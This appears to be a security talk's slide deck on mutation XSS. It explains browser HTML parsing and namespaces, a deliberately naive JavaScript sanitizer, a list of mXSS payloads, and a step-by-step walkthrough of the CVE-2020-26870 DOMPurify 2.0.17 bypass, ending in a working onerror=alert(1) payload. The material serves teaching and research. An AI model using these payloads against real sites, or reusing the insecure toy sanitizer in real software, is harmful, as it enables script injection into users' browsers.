Mutation XSS

&

CVE-2020-26870

Kévin GERVOT (Mizu)

Cybersecurity student at ESAIP

CTF Player @Rhackgondins

Bug Hunter

https://mizu.re

@kevin_mizu

HTML Sanitizer

In data sanitization, HTML sanitization is the process of examining an HTML document and producing a new HTML document that preserves only whatever tags are designated "safe" and desired. HTML sanitization can be used to protect against attacks such as cross-site scripting (XSS) by sanitizing any HTML code submitted by a user.

Source: wikipedia.org

Examples: DOMPurify, sanitize-html, js-xss...

Basic client-side sanitizer

Browser API: DOMParser

HTML Input

<html>
    <head></head>
    <body>
    	<h1 id="title"> Hello World! </h1>
    </body>
</html>

DOM Tree

Browser API: DOMParser

var html = "XXX";
var dom_tree = new DOMParser().parseFromString(html, mime_type);

dom_tree.body
> #document
<html>
    <head></head>
    <body>XXX</body>
</html>

Browser API: NodeIterator

var currentNode;
var input    = "<h1>HELLO</h1><h2>World!</h2><span>TEST</span>"; 
var dom_tree = new DOMParser().parseFromString(input, "text/html");

var nodeIterator = document.createNodeIterator(dom_tree);
while ((currentNode = nodeIterator.nextNode())) {

    switch(currentNode.nodeType) {
        case currentNode.ELEMENT_NODE:
            console.log(currentNode.nodeName.toLowerCase());
    }

}

// Output:
html
head
body
h1

"Simple" example

class Sanitizer {

    constructor() {
        this.version = "1.0.0";
        this.creator = "@kevin_mizu";
        this.ALLOWED_TAGS = ["a", "abbr", ..., "html", "head", "h1", "body"];
        this.ALLOWED_ATTRIBUTES = ["accept", "action", ..., "xmlns", "slot"];
    }

    sanitize = (input) => {
        var currentNode = "";
        // parse the user input
        var dom_tree = new DOMParser().parseFromString(input, "text/html");

        // iterate over all nodes
        var nodeIterator = document.createNodeIterator(dom_tree);
        while ((currentNode = nodeIterator.nextNode())) {

            switch(currentNode.nodeType) {
            	// in case it is a node
                case currentNode.ELEMENT_NODE:
                    var tag_name   = currentNode.nodeName.toLowerCase();
                    var attributes = currentNode.attributes;

                    // sanitize tags
                    if (!this.ALLOWED_TAGS.includes(tag_name)){
                        currentNode.parentElement.removeChild(currentNode);
                    }

                    // sanitize attributes
                    for (let i=0; i < attributes.length; i++) {
                        if (!this.ALLOWED_ATTRIBUTES.includes(attributes[i].name)){
                            currentNode.parentElement.removeChild(currentNode);
                            break;
                        }
                    }
            }
    	}
        // return the sanitized value
        return dom_tree.documentElement.innerHTML;
    }
}

// use the sanitizer
var s 	 = new Sanitizer();
var safe = s.sanitize("<h1>HTML INPUT</h1>");
document.write(safe);

Mutation XSS

https://security.stackexchange.com/questions/46836/what-is-mutation-xss-mxss

Simple mutation

<svg>
    <p></p>
    mutation
</svg>

2019 - Google Search mXSS

By Masato Kinugawa

2019 - Google Search mXSS

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

Simple mXSS payloads

Tag based

iframe | noscript | textarea | style | xmp | noframes | script | noembed | title

<vulnerable><p id="</vulnerable><img src=x onerror=alert()>">mXSS</p>


Commentary based

<!-- <p id="---><img src=x onerror=alert()>">mXSS</p>
<![CDATA[ <! <p id="]]><img src=x onerror=alert()>">mXSS</p>
<! <p id="!><img src=x onerror=alert()>">mXSS</p>
<? <p id="?><img src=x onerror=alert()>">mXSS</p>
</ <p id="/><img src=x onerror=alert()>">mXSS</p>

In real sanitizer context, it won't work with a simple mutation XSS ...

CVE-2020-26870
mXSS in DOMPurify 2.0.17

by SecurityMB (MICHAŁ BENTKOWSKI)

Exploit

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

The Web Hypertext Application Technology Working Group is a community of people interested in evolving HTML and related technologies. The WHATWG was founded by individuals from Apple Inc., the Mozilla Foundation and Opera Software, leading Web browser vendors, in 2004.

Source: wikipedia.org

WhatWG

Style parsing

<style>
    <a href='https://mizu.re/'>HELLO</a>
</style>

Namespaces

<html>
    <head></head>
    <body>
    	HTML NAMESPACE
        
        <svg>
        	SVG NAMESPACE
        </svg>
        
        <math>
        	MATHL NAMESPACE
        </math>
    </body>
</html>

HTML Namespace | SVG Namespace | MathML Namespace

Namespaces differences example

<style>
    <a href='https://mizu.re/'>HELLO</a>
</style>

<math>
    <style>
        <a href='https://mizu.re'>HELLO</a>
    </style>
</math>

Namespaces differences example

HTML namespace

MathML namespace

Exploit chain

Finding double mutation

<form id="outer">
    <div>
</form>
<form id="inner">
    <input>

HTML Input

<form id="outer">
    <div>
        <form id="inner">
            <input>
        </form>
    </div>
</form>

1st Parsing

<form id="outer">
    <div>
        <input>
    </div>
</form>

2nd Parsing

To sum up

<style> tag content is text in HTML namespace
<style> tag content is HTML in MathML namespace
<form> tag can't contain another <form> tag

Exploit chain

Exploit chain idea

HTML Input

<form id="outer">
    <NAMESPACE A>
        <form id="inner">
            <NAMESPACE B>
            	<style>
                MALICIOUS INPUT
                </style>
            </NAMESPACE B>
        </form>
    </NAMESPACE A>
</form>

1st Parsing

<form id="outer">
    <NAMESPACE A>
        <NAMESPACE B></NAMESPACE B>
        <style>MALICIOUS INPUT</style>
    </NAMESPACE A>
</form>

2nd Parsing

TEXT

HTML

Integration Points

<math>
    <mtext>
        <style>
            <a href="https://mizu.re/"></a>
        </style>
    </mtext>
</math>

Integration Points

MathML namespace

HTML namespace

<mtext> tag

Exceptions

<math>
    <mtext>
        <mglyph>
            <style>
                <a href="https://mizu.re/"></a>
            </style>
        </mglyph>
    </mtext>
</math>

Exceptions

MathML namespace

<mtext> tag

<mglyph> tag

MathML namespace

To sum up

<style> tag content is text in HTML namespace
<style> tag content is HTML in MathML namespace
<form> tag can't contain another <form> tag
Text or HTML integration point = HTML namespace
If <mtext><mglyph> = MathML namespace

Exploit chain

Final exploit - Step 1

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

Final exploit - Step 2

Malicious input = text = safe, thanks to mglyph HTML integration point

MathML namespace

Integration

Point

HTML namespace

Final exploit - Step 2

<form>
    <math>
        <mtext>
            <form>
                <mglyph>
                    <style>
                        </math><img src onerror=alert(1)>
                    </style>
                </mglyph>
            </form>
        </mtext>
    </math>
</form>

Final exploit - Step 2->3

<form>
    <math>
        <mtext>
            <form>
                <mglyph>
                    <style>
                        </math><img src onerror=alert(1)>
                    </style>
                </mglyph>
            </form>
        </mtext>
    </math>
</form>

HTML namespace -> MathML namespace

Exception

</math> escape MathML namespace

Final exploit - Step 3

HTML namespace

Final exploit - Step 3

<form>
    <math>
        <mtext>
            <mglyph>
                <style></style>
            </mglyph>
        </mtext>
    </math>
    <img src="" onerror="alert(1)">
</form>

Final exploit - Step 3